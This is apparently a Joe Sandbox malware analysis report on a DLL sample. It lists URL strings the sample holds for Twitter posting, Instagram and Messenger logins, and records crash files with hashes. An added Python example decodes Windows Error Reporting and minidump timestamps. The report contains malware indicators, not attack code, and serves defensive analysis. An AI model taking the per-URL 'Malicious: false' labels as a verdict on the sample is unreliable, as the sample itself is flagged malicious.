Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.messenger.com/origin:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://twitter.com/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://twitter.com/ookie:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://api.twitter.com/1.1/statuses/update.json
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://curl.haxx.se/docs/http-cookies.html
Source: rundll32.exe, 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235936438.0000000010171000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245392829.0000000010171000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://twitter.comsec-fetch-dest:
Source: A8xYhQFvXo.dll
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://upload.twitter.com/i/media/upload.json
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://twitter.com/compose/tweetsec-fetch-mode:
Source: A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.instagram.comsec-fetch-mode:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://www.instagram.com/accounts/login/ajax/facebook/
Source: A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.instagram.com/sec-fetch-site:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://twitter.comReferer:
Source: A8xYhQFvXo.dll
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://www.messenger.com/accept:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: http://www.interestvideo.com/video1.php
Source: A8xYhQFvXo.dll
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://www.messenger.com
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.instagram.com/accept:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.messenger.com/login/nonce/
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.messenger.com/login/nonce/ookie:
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: rundll32.exe, 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.235972167.00000000101CE000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.245432696.00000000101CE000.00000002.00020000.sdmp, A8xYhQFvXo.dll
Malicious: false
Reputation: high

Name: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: A8xYhQFvXo.dll
Malicious: false
Reputation: high

                                                Contacted IPs

                                                No contacted IP infos

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:346331
                                                Start date:30.01.2021
                                                Start time:14:22:06
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 4m 38s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:A8xYhQFvXo (renamed file extension from none to dll)
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal60.winDLL@10/12@0/0
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 100% (good quality ratio 95.7%)
                                                • Quality average: 76.1%
                                                • Quality standard deviation: 26.4%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Stop behavior analysis, all processes terminated
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): WerFault.exe
                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125
                                                • Excluded domains from analysis (whitelisted): skypedataprdcoleus16.cloudapp.net, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, skypedataprdcolwus15.cloudapp.net

                                                Simulations

                                                Behavior and APIs

Time | Type | Description
14:23:06 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
14:23:11 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_5a155b1e9b8901355626d9881b9ed599cf1223_82810a17_1b0352d0\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12526
                                                Entropy (8bit):3.771298130946976
                                                Encrypted:false
                                                SSDEEP:192:Reiq0oXAdHBUZMX4jed+qM/u7sUS274ItWc7:Ei8XiBUZMX4jey/u7sUX4ItWc7
                                                MD5:DF86840392878D8F23C871F2E70B796C
                                                SHA1:C7C4E2ACF2DCC505C36F65B27AC6295237FE230D
                                                SHA-256:C4C8476A732491F39F347BB3CF53FB7859E52E335DEB280B0E3381832744431F
                                                SHA-512:A2015F5D4DF264A4C5BD994E7AA8B0E23632E410F07F7804EC05A5F57EC431926ED69B6E794E53F88C4BF9CBEC423A88AC1570700953B6E169E6ACAD42C10D4F
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.7.1.9.7.1.4.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.8.5.8.7.7.6.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.e.6.a.9.8.9.6.-.1.5.6.6.-.4.a.c.5.-.9.9.8.2.-.b.3.d.9.7.e.d.a.e.e.1.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.1.7.d.0.8.3.-.2.8.e.6.-.4.b.5.c.-.8.d.d.2.-.8.e.7.8.f.1.2.e.8.5.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.0.-.0.0.0.1.-.0.0.1.7.-.b.8.d.d.-.b.c.7.a.5.6.f.7.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_9155b230567b23dc90309f27732428df1d2d4b15_82810a17_1a0b4812\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12524
                                                Entropy (8bit):3.771244807080854
                                                Encrypted:false
                                                SSDEEP:192:s6i00oX0cHBUZMX4jed+qM/u7sUS274ItWcu:9iCXdBUZMX4jey/u7sUX4ItWcu
                                                MD5:A8BBCF85BFD93259DCA577CCBA62C6DF
                                                SHA1:130D348413E2ED000B1621AA9C2A3A0E80C8E559
                                                SHA-256:225C0218DF5763AD8275D5296449CCAB586476298EEA99B173609F90ADD1B05C
                                                SHA-512:937B31AFC1F835464D7A31251B051B77E493FF503C8D5A7819C30C4D95676E67C0DC04B76DB4E35534E3441F995A2D6317229CF075F40D28B71A76B0F13C3C70
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.4.2.9.0.8.9.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.5.1.8.9.8.5.3.3.7.7.7.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.9.0.0.c.7.7.-.9.b.3.2.-.4.f.c.d.-.a.2.a.3.-.d.0.6.7.4.3.b.a.2.e.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.e.f.6.a.8.4.-.c.d.4.d.-.4.9.d.f.-.b.8.b.5.-.3.a.d.e.4.b.f.d.8.7.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.f.c.-.0.0.0.1.-.0.0.1.7.-.d.a.5.9.-.c.5.7.8.5.6.f.7.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_9155b230567b23dc90309f27732428df1d2d4b15_82810a17_1b8b63b8\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12522
                                                Entropy (8bit):3.7708356318523943
                                                Encrypted:false
                                                SSDEEP:192:Geiy0oXMcHBUZMX4jed+qM/u7sUS274ItWcF:XiUXVBUZMX4jey/u7sUX4ItWcF
                                                MD5:192FD41F5E2D69E0D7466FA6DC55B573
                                                SHA1:6900AA02BA64E6BD4C83B288AFA06B8EB1B1F29A
                                                SHA-256:73475F8652413694AB066DD064A7CE658283399E8B15AB99DDE5EFDF1A4EA126
                                                SHA-512:9F399EB22247676DF72B14CED9E166DE4239BD197087FCE012CBE1357BE6F843BD9BBEBC3379B3BF30D48B5C58E02D2DFD2A4413344D247BB6C3FE13D96984B3
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.5.1.8.9.9.2.2.2.8.5.6.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.5.1.8.9.9.3.0.7.2.1.2.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.8.6.a.a.9.4.-.6.2.d.7.-.4.6.f.7.-.a.7.3.1.-.b.2.c.d.8.e.c.2.5.9.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.9.7.b.e.d.d.-.4.6.f.0.-.4.c.b.d.-.9.3.9.f.-.7.8.f.2.8.3.d.2.2.b.9.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.c.-.0.0.0.1.-.0.0.1.7.-.7.f.c.2.-.a.c.7.c.5.6.f.7.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DB2.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 30 22:23:04 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):54380
                                                Entropy (8bit):2.0015561523103194
                                                Encrypted:false
                                                SSDEEP:192:nCduNZT6NASLzm9NbqLzdtQGd2K/WjZerJWGZKXZh4KzNxVw:CLzwbiCO27VeAGZOZhrRw
                                                MD5:9960CD95476181EF57DFC589CA17D6CE
                                                SHA1:13DB12E3C3A8645F2FD0D1EA6A45272C7FD689BC
                                                SHA-256:FBA058585194DA498260F97D7D25451379657E0BB3DDA7231050553EC44F8473
                                                SHA-512:2562F958B912B8B367417C90446C6B6F3F925710DC3B79D97CFFBDC44A1421612680CDF12E100DC787CE9420E24C6302C2796F88701F30A1C38A27B6149A0213
                                                Malicious:false
                                                Reputation:low
                                                Preview: MDMP....... .......H..`...................U...........B......D ......GenuineIntelW...........T...........E..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
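The three Report.wer files above are UTF-16LE key=value text (the preview shows every second byte as a dot), and the .tmp.dmp files are minidumps whose fixed 32-byte MINIDUMP_HEADER carries the stream count, a time_t timestamp and the MINIDUMP_TYPE flags that the `file` description prints. Two fields in Report.wer are worth decoding by hand: EventTime is a FILETIME (100-nanosecond ticks since 1601-01-01 UTC), and Wow64Host/Wow64Guest are PE machine codes, 34404 (0x8664, AMD64) and 332 (0x14C, I386), i.e. a 32-bit rundll32.exe crashing under WOW64, which is why the reporter is SysWOW64\WerFault.exe. The Python below is an added example, not part of the report or of the sample: it parses both artifacts and checks that a Report.wer event time and a minidump timestamp belong to the same crash. The Report.wer bytes and the dump header are constructed from values in the previews above (a handful of fields only, and a header with no streams behind it); the timestamp used is the one `file` printed for WER493B.tmp.dmp.

```python
import struct
from datetime import datetime, timedelta, timezone

# --- Report.wer: UTF-16LE key=value text, constructed from the preview above ---
# Only the fields used here are reproduced; a real Report.wer carries many more.
REPORT_WER = (
    "\ufeffVersion=1\r\nEventType=APPCRASH\r\nEventTime=132565189871971408\r\n"
    "ReportType=2\r\nReportIdentifier=3e6a9896-1566-4ac5-9982-b3d97edaee1c\r\n"
    "Wow64Host=34404\r\nWow64Guest=332\r\nNsAppName=rundll32.exe\r\n"
).encode("utf-16-le")

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
IMAGE_FILE_MACHINE = {0x14C: "I386", 0x8664: "AMD64"}   # PE machine codes


def filetime_to_utc(ticks: int) -> datetime:
    """WER EventTime is a FILETIME: 100-nanosecond ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_report_wer(raw: bytes) -> dict:
    """Decode a Report.wer and add derived fields (UTC event time, host/guest arch)."""
    fields = {}
    for line in raw.decode("utf-16").splitlines():   # "utf-16" honours the BOM
        key, sep, value = line.partition("=")
        if sep:
            fields[key] = value
    fields["EventTimeUTC"] = filetime_to_utc(int(fields["EventTime"]))
    fields["HostArch"] = IMAGE_FILE_MACHINE.get(int(fields["Wow64Host"]), "unknown")
    fields["GuestArch"] = IMAGE_FILE_MACHINE.get(int(fields["Wow64Guest"]), "unknown")
    return fields


# --- Minidump: fixed 32-byte MINIDUMP_HEADER at offset 0 ---
# Signature, Version, NumberOfStreams, StreamDirectoryRva, CheckSum,
# TimeDateStamp (time_t), Flags (MINIDUMP_TYPE bit set)
MINIDUMP_HEADER = struct.Struct("<IIIIIIQ")
MINIDUMP_VERSION = 0xA793   # low 16 bits of the Version field


def build_dump_header(timestamp: int, streams: int = 14, flags: int = 0x1205A4) -> bytes:
    """Constructed header only (no streams follow); values mirror the `file` output above."""
    return MINIDUMP_HEADER.pack(int.from_bytes(b"MDMP", "little"), MINIDUMP_VERSION,
                                streams, MINIDUMP_HEADER.size, 0, timestamp, flags)


def parse_minidump_header(raw: bytes) -> dict:
    if raw[:4] != b"MDMP":
        raise ValueError("not a minidump: bad signature")
    _, version, streams, _, _, ts, flags = MINIDUMP_HEADER.unpack_from(raw, 0)
    return {
        "version": version & 0xFFFF,
        "streams": streams,
        "time_utc": datetime.fromtimestamp(ts, tz=timezone.utc),
        "flags": flags,
    }


def crash_times_agree(wer: dict, dmp: dict, tolerance_s: float = 2.0) -> bool:
    """WER writes the .dmp and the Report.wer of one crash within moments of each other."""
    delta = abs((wer["EventTimeUTC"] - dmp["time_utc"]).total_seconds())
    return delta <= tolerance_s


# 1612045387 == 2021-01-30 22:23:07 UTC, the time `file` printed for WER493B.tmp.dmp
DUMP_HEADER = build_dump_header(1612045387)

if __name__ == "__main__":
    wer = parse_report_wer(REPORT_WER)
    dmp = parse_minidump_header(DUMP_HEADER)
    print(wer["NsAppName"], wer["EventTimeUTC"], wer["GuestArch"], "on", wer["HostArch"])
    print("dump:", dmp["streams"], "streams", dmp["time_utc"], hex(dmp["flags"]))
    print("same crash window:", crash_times_agree(wer, dmp))
```

Running this on the values from the page gives 2021-01-30 22:23:07 UTC for the first Report.wer, which lines up with the WER493B.tmp.dmp timestamp; the same conversion on the second Report.wer (EventTime=132565189842908997) lands on 22:23:04, the time of WER3DB2.tmp.dmp. Pairing the two artifacts this way is how you tell which dump belongs to which rundll32.exe PID when several crash within seconds.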
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER4043.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8266
                                                Entropy (8bit):3.6968442224830307
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNiqT696YAT6Kh62mgmfTuSBCprRg89bNisfQvm:RrlsNie696Y06662mgmfTuSGdNhfl
                                                MD5:43BD54E768548B366930B31787D276A8
                                                SHA1:D5C19415165E51B494EAAD9DF4591D8EDB909D71
                                                SHA-256:335195883725319DA55D5CA8881958618530D96B6F0CE6CAAD6F82C44A658C95
                                                SHA-512:223D9237FC5DEC58112BFFCB7C646367A17B42E72708CFA0162F0137D61999929A30A3996950271577E0A1A5C800BFE4D0FF5055739455E8269B10A6A7B78A21
                                                Malicious:false
                                                Reputation:low
                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.5.2.<./.P.i.d.>.......
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER413E.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4629
                                                Entropy (8bit):4.472952170485334
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zsxBJgtWI9G4WSC8BZ8fm8M4JCdsUFrX+q8/oJ34SrSCd:uITfVdxSNQJOX53DWCd
                                                MD5:779F5EA92B661C11A3A26AB103727370
                                                SHA1:366C7DDF4A32E5C0591C9E34849D9D6C4900BDC2
                                                SHA-256:74D3C03945E2A0F8211980261729AC387EDD10FB56F6DDD5F5CA78B61FDF8EAF
                                                SHA-512:86C1FE4E3C75BA60CF81BEC9C5A0C409E25BC5F24FCC0FA6084D90CBD2D113BA3770E81A683C09B18874713A7DB4D3C391AEA284AF46E90F4F124412D9878B91
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="839973" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER493B.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 30 22:23:07 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):55552
                                                Entropy (8bit):1.962155911528806
                                                Encrypted:false
                                                SSDEEP:192:FciIrVXsfykKu65g9voRtOvi5QGd2K/WjZZdEyhZcw8InW:/w8fMuloRKvO27VZ2yhZ+IW
                                                MD5:C7014E8E5C3E4F741F04C9853D9797CF
                                                SHA1:FE187847ADBF96DB39301A1C1B04F30E3E3DB4E9
                                                SHA-256:EA37623DB683B059EFA3CB4954B86124F93301F3EC41F6CBDF0AED05298AEF88
                                                SHA-512:C8B0C4ADA17F15A753BF1CB71F3BDD3AF5A23FF1BBDED1427B41BFB9105AE34AE62227D30B899FC9C4897A1F8C4C59CFD531BB4A636837929279F5C9A734C394
                                                Malicious:false
                                                Reputation:low
